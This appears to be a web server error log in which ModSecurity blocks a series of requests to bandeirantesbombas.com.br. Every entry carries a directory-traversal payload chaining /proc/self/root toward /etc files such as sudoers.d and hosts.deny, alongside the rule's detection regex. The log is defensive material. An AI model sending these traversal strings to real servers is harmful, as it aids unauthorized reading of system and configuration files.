https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:14:53.250635 2026] [:error] [pid 11972:tid 140411632822016] [client 74.7.243.203:44990] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgQXZqj1wV0Si-Okefi4gAAAA0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:15:04.459720 2026] [:error] [pid 10651:tid 140411666392832] [client 74.7.241.46:39924] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgQaLysWC90G-1nBrA7wwAAAYk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 11:15:13.235560 2026] [:error] [pid 21533:tid 140411666392832] [client 74.7.243.203:60992] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgQcXjZBu2q05ozVU9NTAAAAUk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 11:15:14.529851 2026] [:error] [pid 21946:tid 140411557287680] [client 74.7.243.203:34444] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgQcnbQATo66fKoS7xFhAAAANY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 11:15:15.821195 2026] [:error] [pid 21533:tid 140411649607424] [client 74.7.243.203:34456] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgQc3jZBu2q05ozVU9NTgAAAUs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:15:18.044145 2026] [:error] [pid 21946:tid 140411708356352] [client 74.7.241.46:55786] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgQdnbQATo66fKoS7xFiAAAAMQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 11:15:22.658612 2026] [:error] [pid 32654:tid 140411708356352] [client 74.7.241.46:55354] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgQeglT9VtDQc7bgUyk2AAAAQQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:15:32.467874 2026] [:error] [pid 21805:tid 140411649607424] [client 74.7.241.46:55356] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgQhLABkC4fWIHEf8HirgAAAEs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 11:15:35.274888 2026] [:error] [pid 10709:tid 140411708356352] [client 74.7.241.46:39158] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgQhxXjF1vJNtV6CWru4QAAAcQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:15:37.687561 2026] [:error] [pid 21805:tid 140411574073088] [client 74.7.241.46:39172] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgQibABkC4fWIHEf8HisAAAAFQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/run/initramfs/state/etc
[Mon Mar 16 11:15:39.005479 2026] [:error] [pid 11972:tid 140411599251200] [client 74.7.241.46:53420] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgQi5qj1wV0Si-Okefi6wAAABE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:15:40.271610 2026] [:error] [pid 21946:tid 140411666392832] [client 74.7.241.46:53430] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgQjHbQATo66fKoS7xFiQAAAMk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:15:51.163955 2026] [:error] [pid 10651:tid 140411691570944] [client 74.7.241.46:53442] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgQl7ysWC90G-1nBrA7zQAAAYY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:15:58.665685 2026] [:error] [pid 21533:tid 140411557287680] [client 74.7.243.203:34470] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgQnnjZBu2q05ozVU9NdwAAAVY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 11:16:00.912081 2026] [:error] [pid 10709:tid 140411699963648] [client 74.7.243.203:52526] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgQoBXjF1vJNtV6CWru5AAAAcU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:16:04.339933 2026] [:error] [pid 32654:tid 140411666392832] [client 74.7.241.46:40476] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgQowlT9VtDQc7bgUyk7QAAAQk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:16:09.353059 2026] [:error] [pid 21806:tid 140411574073088] [client 74.7.243.203:51202] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgQp9SswJuvopo3lOhW-wAAAJQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 11:16:09.357474 2026] [:error] [pid 10831:tid 140411649607424] [client 74.7.241.46:38492] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgQqI6lpbStxTqkSktklgAAAks"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:16:12.904013 2026] [:error] [pid 10651:tid 140411683178240] [client 74.7.241.46:40796] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgQrLysWC90G-1nBrA71gAAAYc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/var/run/initramfs/state/etc
[Mon Mar 16 11:16:18.300942 2026] [:error] [pid 21946:tid 140411582465792] [client 74.7.243.203:58298] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/hosts.deny"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgQsnbQATo66fKoS7xFlAAAANM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:16:20.039119 2026] [:error] [pid 10709:tid 140411641214720] [client 74.7.243.203:58302] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/issue"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgQsxXjF1vJNtV6CWrvFQAAAcw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:16:21.398582 2026] [:error] [pid 21533:tid 140411599251200] [client 74.7.243.203:49884] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgQtXjZBu2q05ozVU9NegAAAVE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
